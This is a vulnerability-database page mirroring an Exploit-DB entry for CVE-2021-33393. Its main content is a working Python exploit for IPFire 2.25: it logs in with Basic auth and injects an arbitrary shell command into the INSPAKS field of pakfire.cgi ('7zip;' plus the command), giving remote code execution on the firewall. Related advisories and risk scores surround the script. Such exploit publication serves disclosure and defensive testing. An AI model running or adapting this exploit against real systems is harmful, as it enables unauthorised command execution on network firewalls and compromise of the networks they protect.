Lucene search
K

IPFire 2.25 - Remote Code Execution (Authenticated)

🗓️ 17 May 2021 00:00:00Reported by Mücahit SaratarType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 288 Views

IPFire 2.25 Remote Code Execution (Authenticated) allows unauthorized commands executio

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2021-33393
16 May 202618:08
githubexploit
0day.today
IPFire 2.25 Remote Code Execution Exploit
15 Jun 202100:00
zdt
Circl
CVE-2021-33393
14 Jun 202123:08
circl
CNNVD
IPFire Firewall 安全漏洞
9 Jun 202100:00
cnnvd
CNVD
IPFire Firewall Remote Code Execution Vulnerability
11 Jun 202100:00
cnvd
Check Point Advisories
IPFire Remote Code Execution (CVE-2021-33393)
1 Jun 202100:00
checkpoint_advisories
CVE
CVE-2021-33393
9 Jun 202121:25
cve
Cvelist
CVE-2021-33393
9 Jun 202121:25
cvelist
Metasploit
IPFire 2.25 Core Update 156 and Prior pakfire.cgi Authenticated RCE
15 Jun 202117:50
metasploit
NVD
CVE-2021-33393
9 Jun 202122:15
nvd
Rows per page
# Exploit Title: IPFire 2.25 - Remote Code Execution (Authenticated)
# Date: 15/05/2021
# Exploit Author: Mücahit Saratar
# Vendor Homepage: https://www.ipfire.org/
# Software Link: https://downloads.ipfire.org/releases/ipfire-2.x/2.25-core156/ipfire-2.25.x86_64-full-core156.iso
# Version: 2.25 - core update 156
# Tested on: parrot os 5.7.0-2parrot2-amd64
# CVE: CVE-2021-33393

#!/usr/bin/python3

import requests as R
import sys
import base64

try:
    host = sys.argv[1]
    assert host[:4] == "http" and host[-1] != "/"
    url = host + "/cgi-bin/pakfire.cgi"
    username = sys.argv[2]
    password = sys.argv[3]
    komut = sys.argv[4]
except:
    print(f"{sys.argv[0]} http://target.com:444 username password command")
    exit(1)

veri = { 
        "INSPAKS": f"7zip;{komut}",
        "ACTION":"install",
        "x": "10",
        "y": "6" }
token = b"Basic " + base64.b64encode(f"{username}:{password}".encode())
header = {"Authorization": token,
        "Connection": "close",
        "Cache-Control": "max-age=0",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36",
        "Origin": host,
        "Sec-GPC": "1",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-User": "?1",
        "Sec-Fetch-Dest": "document",
        "Referer": host}


R.post(url, data=veri, headers=header, verify=False)
print("Done.")

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 May 2021 00:00Current
9High risk
Vulners AI Score9
CVSS 3.18.8
CVSS 29
EPSS0.72182
288